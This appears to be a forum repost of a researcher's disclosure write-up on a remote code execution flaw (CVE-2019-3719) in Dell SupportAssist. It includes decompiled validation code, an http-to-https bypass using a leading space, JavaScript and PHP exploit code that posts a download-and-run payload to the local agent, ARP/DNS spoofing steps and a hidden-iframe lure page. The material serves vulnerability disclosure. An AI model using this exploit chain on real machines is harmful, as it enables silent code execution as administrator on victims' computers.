Remote Code Execution on most Dell computers

  1. 6 weeks ago

    Men in Black

    May 5 Administrator + 72800 RP

    Remote Code Execution on most Dell computers

    What computer do you use? Who made it? Have you ever thought about what came with your computer? When we think of Remote Code Execution (RCE) vulnerabilities in mass, we might think of vulnerabilities in the operating system, but another attack vector to consider is “What third-party software came with my PC?”. In this article, I’ll be looking at a Remote Code Execution vulnerability I found in Dell SupportAssist, software meant to “proactively check the health of your system’s hardware and software” and which is “preinstalled on most of all new Dell devices”.

    Discovery

    Back in September, I was in the market for a new laptop because my 7-year-old Macbook Pro just wasn’t cutting it anymore. I was looking for an affordable laptop that had the performance I needed and I decided on Dell’s G3 15 laptop. I decided to upgrade my laptop’s 1 terabyte hard drive to an SSD. After upgrading and re-installing Windows, I had to install drivers. This is when things got interesting. After visiting Dell’s support site, I was prompted with an interesting option.

    1.png

    “Detect PC”? How would it be able to detect my PC? Out of curiosity, I clicked on it to see what happened.

    2.png

    A program which automatically installs drivers for me. Although it was a convenient feature, it seemed risky. The agent wasn’t installed on my computer because it was a fresh Windows installation, but I decided to install it to investigate further. It was very suspicious that Dell claimed to be able to update my drivers through a website.

    Installing it was a painless process with just a click to install button. In the shadows, the SupportAssist Installer created the SupportAssistAgent and the Dell Hardware Support service. These services corresponded to .NET binaries making it easy to reverse engineer what it did. After installing, I went back to the Dell website and decided to check what it could find.

    3koDq6L.png

    I opened the Chrome Web Inspector and the Network tab then pressed the “Detect Drivers” button.

    bEVfaii.png

    The website made requests to port 8884 on my local computer. Checking that port out on Process Hacker showed that the SupportAssistAgent service had a web server on that port. What Dell was doing is exposing a REST API of sorts in their service which would allow communication from the Dell website to do various requests. The web server replied with a strict Access-Control-Allow-Origin header of https://www.dell.com to prevent other websites from making requests.

    On the web browser side, the client was providing a signature to authenticate various commands. These signatures are generated by making a request to https://www.dell.com/support/home/us/en/04/drivers/driversbyscan/getdsdtoken which also provides when the signature expires. After pressing download drivers on the web side, this request was of particular interest:

    POST http://127.0.0.1:8884/downloadservice/downloadmanualinstall?expires=expiretime&signature=signature
    Accept: application/json, text/javascript, */*; q=0.01
    Content-Type: application/json
    Origin: https://www.dell.com
    Referer: https://www.dell.com/support/home/us/en/19/product-support/servicetag/xxxxx/drivers?showresult=true&files=1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36
    The body:
    
    [
        {
        "title":"Dell G3 3579 and 3779 System BIOS",
        "category":"BIOS",
        "name":"G3_3579_1.9.0.exe",
        "location":"https://downloads.dell.com/FOLDER05519523M/1/G3_3579_1.9.0.exe?uid=29b17007-bead-4ab2-859e-29b6f1327ea1&fn=G3_3579_1.9.0.exe",
        "isSecure":false,
        "fileUniqueId":"acd94f47-7614-44de-baca-9ab6af08cf66",
        "run":false,
        "restricted":false,
        "fileId":"198393521",
        "fileSize":"13 MB",
        "checkedStatus":false,
        "fileStatus":-99,
        "driverId":"4WW45",
        "path":"",
        "dupInstallReturnCode":"",
        "cssClass":"inactive-step",
        "isReboot":true,
        "DiableInstallNow":true,
        "$$hashKey":"object:175"
        }
    ]

    It seemed like the web client could make direct requests to the SupportAssistAgent service to “download and manually install” a program. I decided to find the web server in the SupportAssistAgent service to investigate what commands could be issued.

    On start, Dell SupportAssist starts a web server (System.Net.HttpListener ) on either port 8884, 8883, 8886, or port 8885. The port depends on whichever one is available, starting with 8884. On a request, the ListenerCallback located in HttpListenerServiceFacade calls ClientServiceHandler.ProcessRequest.

    ClientServiceHandler.ProcessRequest, the base web server function, starts by doing integrity checks for example making sure the request came from the local machine and various other checks. Later in this article, we’ll get into some of the issues in the integrity checks, but for now most are not important to achieve RCE.

    An important integrity check for us is in ClientServiceHandler.ProcessRequest, specifically the point at which the server checks to make sure my referrer is from Dell. ProcessRequest calls the following function to ensure that I am from Dell:

    // Token: 0x060000A8 RID: 168 RVA: 0x00004EA0 File Offset: 0x000030A0
    public static bool ValidateDomain(Uri request, Uri urlReferrer)
    {
    	return SecurityHelper.ValidateDomain(urlReferrer.Host.ToLower()) && (request.Host.ToLower().StartsWith("127.0.0.1") || request.Host.ToLower().StartsWith("localhost")) &&request.Scheme.ToLower().StartsWith("http") && urlReferrer.Scheme.ToLower().StartsWith("http");
    }
    
    // Token: 0x060000A9 RID: 169 RVA: 0x00004F24 File Offset: 0x00003124
    public static bool ValidateDomain(string domain)
    {
    	return domain.EndsWith(".dell.com") || domain.EndsWith(".dell.ca") || domain.EndsWith(".dell.com.mx") || domain.EndsWith(".dell.com.br") || domain.EndsWith(".dell.com.pr") || domain.EndsWith(".dell.com.ar") || domain.EndsWith(".supportassist.com");
    }

    The issue with the function above is the fact that it really isn’t a solid check and gives an attacker a lot to work with. To bypass the Referer/Origin check, we have a few options:

    • Find a Cross Site Scripting vulnerability in any of Dell’s websites (I should only have to find one on the sites designated for SupportAssist)
    • Find a Subdomain Takeover vulnerability
    • Make the request from a local program
    • Generate a random subdomain name and use an external machine to DNS Hijack the victim. Then, when the victim requests [random].dell.com, we respond with our server.

    In the end, I decided to go with option 4, and I’ll explain why in a later bit. After verifying the Referer/Origin of the request, ProcessRequest sends the request to corresponding functions for GET, POST, and OPTIONS.

    When I was learning more about how Dell SupportAssist works, I intercepted different types of requests from Dell’s support site. Luckily, my laptop had some pending updates, and I was able to intercept requests through my browsers console.

    At first, the website tries to detect SupportAssist by looping through the aformentioned service ports and connecting to the Service Method “isalive”. What was interesting was that it was passing a “Signature” parameter and a “Expires” parameter. To find out more, I reversed the javascript side of the browser. Here’s what I found out:

    • First, the browser makes a request to https://www.dell.com/support/home/us/en/04/drivers/driversbyscan/getdsdtoken and gets the latest “Token”, or the signatures I was talking about earlier. The endpoint also provides the “Expires token”. This solves the signature problem.
    • Next, the browser makes a request to each service port with a style like this: http://127.0.0.1:[SERVICEPORT]/clientservice/isalive/?expires=[EXPIRES]&signature=[SIGNATURE].
    • The SupportAssist client then responds when the right service port is reached, with a style like this:
        {
         "isAlive": true,
         "clientVersion": "[CLIENT VERSION]",
         "requiredVersion": null,
         "success": true,
         "data": null,
         "localTime": [EPOCH TIME],
         "Exception": {
             "Code": null,
             "Message": null,
             "Type": null
         }
        }

    -Once the browser sees this, it continues with further requests using the now determined service port.

    Some concerning factors I noticed while looking at different types of requests I could make is that I could get a very detailed description of every piece of hardware connected to my computer using the “getsysteminfo” route. Even through Cross Site Scripting, I was able to access this data, which is an issue because I could seriously fingerprint a system and find some sensitive information.

    Here are the methods the agent exposes:

    clientservice_getdevicedrivers - Grabs available updates.
    diagnosticsservice_executetip - Takes a tip guid and provides it to the PC Doctor service (Dell Hardware Support).
    downloadservice_downloadfiles - Downloads a JSON array of files.
    clientservice_isalive - Used as a heartbeat and returns basic information about the agent.
    clientservice_getservicetag - Grabs the service tag.
    localclient_img - Connects to SignalR (Dell Hardware Support).
    diagnosticsservice_getsysteminfowithappcrashinfo - Grabs system information with crash dump information.
    clientservice_getclientsysteminfo - Grabs information about devices on system and system health information optionally.
    diagnosticsservice_startdiagnosisflow - Used to diagnose issues on system.
    downloadservice_downloadmanualinstall - Downloads a list of files but does not execute them.
    diagnosticsservice_getalertsandnotifications - Gets any alerts and notifications that are pending.
    diagnosticsservice_launchtool - Launches a diagnostic tool.
    diagnosticsservice_executesoftwarefixes - Runs remediation UI and executes a certain action.
    downloadservice_createiso - Download an ISO.
    clientservice_checkadminrights - Check if the Agent privileged.
    diagnosticsservice_performinstallation - Update SupportAssist.
    diagnosticsservice_rebootsystem - Reboot system.
    clientservice_getdevices - Grab system devices.
    downloadservice_dlmcommand - Check on the status of or cancel an ongoing download.
    diagnosticsservice_getsysteminfo - Call GetSystemInfo on PC Doctor (Dell Hardware Support).
    downloadservice_installmanual - Install a file previously downloaded using downloadservice_downloadmanualinstall.
    downloadservice_createbootableiso - Download bootable iso.
    diagnosticsservice_isalive - Heartbeat check.
    downloadservice_downloadandautoinstall - Downloads a list of files and executes them.
    clientservice_getscanresults - Gets driver scan results.
    downloadservice_restartsystem - Restarts the system.

    The one that caught my interest was downloadservice_downloadandautoinstall. This method would download a file from a specified URL and then run it. This method is ran by the browser when the user needs to install certain drivers that need to be installed automatically.

    • After finding which drivers need updating, the browser makes a POST request to “http://127.0.0.1:[SERVICE PORT]/downloadservice/downloadandautoinstall?expires=[EXPIRES]&signature=[SIGNATURE]”.
    • The browser sends a request with the following JSON structure:
        [
         {
         "title":"DOWNLOAD TITLE",
         "category":"CATEGORY",
         "name":"FILENAME",
         "location":"FILE URL",
         "isSecure":false,
         "fileUniqueId":"RANDOMUUID",
         "run":true,
         "installOrder":2,
         "restricted":false,
         "fileStatus":-99,
         "driverId":"DRIVER ID",
         "dupInstallReturnCode":0,
         "cssClass":"inactive-step",
         "isReboot":false,
         "scanPNPId":"PNP ID",
         "$$hashKey":"object:210"
         }
        ] 
    • After doing the basic integrity checks we discussed before, ClientServiceHandler.ProcessRequest sends the ServiceMethod and the parameters we passed to ClientServiceHandler.HandlePost.
    • ClientServiceHandler.HandlePost first puts all parameters into a nice array, then calls ServiceMethodHelper.CallServiceMethod.
    • ServiceMethodHelper.CallServiceMethod acts as a dispatch function, and calls the function given the ServiceMethod. For us, this is the “downloadandautoinstall” method:
        if (service_Method == "downloadservice_downloadandautoinstall")
        {
         string files5 = (arguments != null && arguments.Length != 0 && arguments[0] != null) ? arguments[0].ToString() : string.Empty;
         result = DownloadServiceLogic.DownloadAndAutoInstall(files5, false);
        } 
    • Which calls DownloadServiceLogic.DownloadAutoInstall and provides the files we sent in the JSON payload.
    • DownloadServiceLogic.DownloadAutoInstall acts as a wrapper (i.e handling exceptions) for DownloadServiceLogic._HandleJson.
    • DownloadServiceLogic._HandleJson deserializes the JSON payload containing the list of files to download, and does the following integrity checks:
        foreach (File file in list)
        {
         bool flag2 = file.Location.ToLower().StartsWith("http://");
         if (flag2)
         {
             file.Location = file.Location.Replace("http://", "https://");
         }
         bool flag3 = file != null && !string.IsNullOrEmpty(file.Location) && !SecurityHelper.CheckDomain(file.Location);
         if (flag3)
         {
             DSDLogger.Instance.Error(DownloadServiceLogic.Logger, "InvalidFileException being thrown in _HandleJson method");
             throw new InvalidFileException();
         }
        }
        DownloadHandler.Instance.RegisterDownloadRequest(CreateIso, Bootable, Install, ManualInstall, list);

    The above code loops through every file, and checks if the file URL we provided doesn’t start with http:// (if it does, replace it with https://), and checks if the URL matches a list of Dell’s download servers (not all subdomains):

    public static bool CheckDomain(string fileLocation)
    {
    	List<string> list = new List<string>
    	{
    		"ftp.dell.com",
    		"downloads.dell.com",
    		"ausgesd4f1.aus.amer.dell.com"
    	};
    	
    	return list.Contains(new Uri(fileLocation.ToLower()).Host);
    } 

    -Finally, if all these checks pass, the files get sent to DownloadHandler.RegisterDownloadRequest at which point the SupportAssist downloads and runs the files as Administrator.

    This is enough information we need to start writing an exploit.

    Exploitation

    The first issue we face is making requests to the SupportAssist client. Assume we are in the context of a Dell subdomain, we’ll get into how exactly we do this further in this section. I decided to mimic the browser and make requests using javascript.

    First things first, we need to find the service port. We can do this by polling through the predefined service ports, and making a request to “/clientservice/isalive”. The issue is that we need to also provide a signature. To get the signature that we pass to isalive, we can make a request to “https://www.dell.com/support/home/us/en/04/drivers/driversbyscan/getdsdtoken”.

    This isn’t as straight-forwards as it might seem. The “Access-Control-Allow-Origin” of the signature url is set to “https://www.dell.com”. This is a problem, because we’re in the context of a subdomain, probably not https. How do we get past this barrier? We make the request from our own servers!

    The signatures that are returned from “getdsdtoken” are applicable to all machines, and not unique. I made a small PHP script that will grab the signatures:

    <?php
    header('Access-Control-Allow-Origin: *');
    echo file_get_contents('https://www.dell.com/support/home/us/en/04/drivers/driversbyscan/getdsdtoken');
    ?> 

    The header call allows anyone to make a request to this PHP file, and we just echo the signatures, acting as a proxy to the “getdsdtoken” route. The “getdsdtoken” route returns JSON with signatures and an expire time. We can just use JSON.parse on the results to place the signatures into a javascript object.

    Now that we have the signature and expire time, we can start making requests. I made a small function that loops through each server port, and if we reach it, we set the server_port variable (global) to the port that responded:

    function FindServer() { ports.forEach(function(port) { var is_alive_url = "http://127.0.0.1:" + port + "/clientservice/isalive/?expires=" + signatures.Expires + "&signature=" + signatures.IsaliveToken; var response = SendAsyncRequest(is_alive_url, function(){server_port = port;}); }); }

    After we have found the server, we can send our payload. This was the hardest part, we have some serious obstacles before “downloadandautoinstall” executes our payload.

    Starting with the hardest issue, the SupportAssist client has a hard whitelist on file locations. Specifically, its host must be either “ftp.dell.com”, “downloads.dell.com”, or “ausgesd4f1.aus.amer.dell.com”. I almost gave up at this point, because I couldn’t find an open redirect vulnerability on any of the sites. Then it hit me, we can do a man-in-the-middle attack.

    If we could provide the SupportAssist client with a http:// URL, we could easily intercept and change the response! This somewhat solves the hardest challenge.

    The second obstacle was designed specifically to counter my solution to the first obstacle. If we look back to the steps I outlined, if the file URL starts with http://, it will be replaced by https://. This is an issue, because we can’t really intercept and change the contents of a proper https connection. The key bypass to this mitigation was in this sentence: “if the URL starts with http://, it will be replaced by https://”. See, the thing was, if the URL string did not start with http://, even if there was http:// somewhere else in the string, it wouldn’t replace it. Getting a URL to work was tricky, but I eventually came up with “ http://downloads.dell.com/abcdefg” (the space is intentional). When you ran the string through the starts with check, it would return false, because the string starts with “ “, thus leaving the “http://” alone.

    I made a function that automated sending the payload:

    function SendRCEPayload() {
    	var auto_install_url = "http://127.0.0.1:" + server_port + "/downloadservice/downloadandautoinstall?expires=" + signatures.Expires + "&signature=" + signatures.DownloadAndAutoInstallToken;
    
    	var xmlhttp = new XMLHttpRequest();
    	xmlhttp.open("POST", auto_install_url, true);
    
    	var files = [];
    	
    	files.push({
    	"title": "SupportAssist RCE",
    	"category": "Serial ATA",
    	"name": "calc.EXE",
    	"location": " http://downloads.dell.com/calc.EXE", // those spaces are KEY
    	"isSecure": false,
    	"fileUniqueId": guid(),
    	"run": true,
    	"installOrder": 2,
    	"restricted": false,
    	"fileStatus": -99,
    	"driverId": "FXGNY",
    	"dupInstallReturnCode": 0,
    	"cssClass": "inactive-step",
    	"isReboot": false,
    	"scanPNPId": "PCI\\VEN_8086&DEV_282A&SUBSYS_08851028&REV_10",
    	"$$hashKey": "object:210"});
    	
    	xmlhttp.send(JSON.stringify(files)); 
    }

    Next up was the attack from the local network. Here are the steps I take in the external portion of my proof of concept (attacker’s machine):

    • Grab the interface IP address for the specified interface.
    • Start the mock web server and provide it with the filename of the payload we want to send. The web server checks if the Host header is downloads.dell.com and if so sends the binary payload. If the request Host has dell.com in it and is not the downloads domain, it sends the javascript payload which we mentioned earlier.
    • To ARP Spoof the victim, we first enable ip forwarding then send an ARP packet to the victim telling it that we’re the router and an ARP packet to the router telling it that we’re the victim machine. We repeat these packets every few seconds for the duration of our exploit. On exit, we will send the original mac addresses to the victim and router.
    • Finally, we DNS Spoof by using iptables to redirect DNS packets to a netfilter queue. We listen to this netfilter queue and check if the requested DNS name is our target URL. If so, we send a fake DNS packet back indicating that our machine is the true IP address behind that URL.
    • When the victim visits our subdomain (either directly via url or indirectly by an iframe), we send it the malicious javascript payload which finds the service port for the agent, grabs the signature from the php file we created earlier, then sends the RCE payload. When the RCE payload is processed by the agent, it will make a request to downloads.dell.com which is when we return the binary payload.

    You can read Dell’s advisory here .

    Demo

    Here’s a small demo video showcasing the vulnerability. You can download the source code of the proof of concept here .

    The source code of the dellrce.html file featured in the video is:

    <h1>CVE-2019-3719</h1>
    <h1>Nothing suspicious here... move along...</h1>
    <iframe src="http://www.dellrce.dell.com" style="width: 0; height: 0; border: 0; border: none; position: absolute;"></iframe>

    Timeline

    • 10/26/2018 - Initial write up sent to Dell.
    • 10/29/2018 - Initial response from Dell.
    • 11/22/2018 - Dell has confirmed the vulnerability.
    • 11/29/2018 - Dell scheduled a “tentative” fix to be released in Q1 2019.
    • 01/28/2019 - Disclosure date extended to March.
    • 03/13/2019 - Dell is still fixing the vulnerability and has scheduled disclosure for the end of April.
    • 04/18/2019 - Vulnerability disclosed as an advisory .
 

or Sign Up to reply!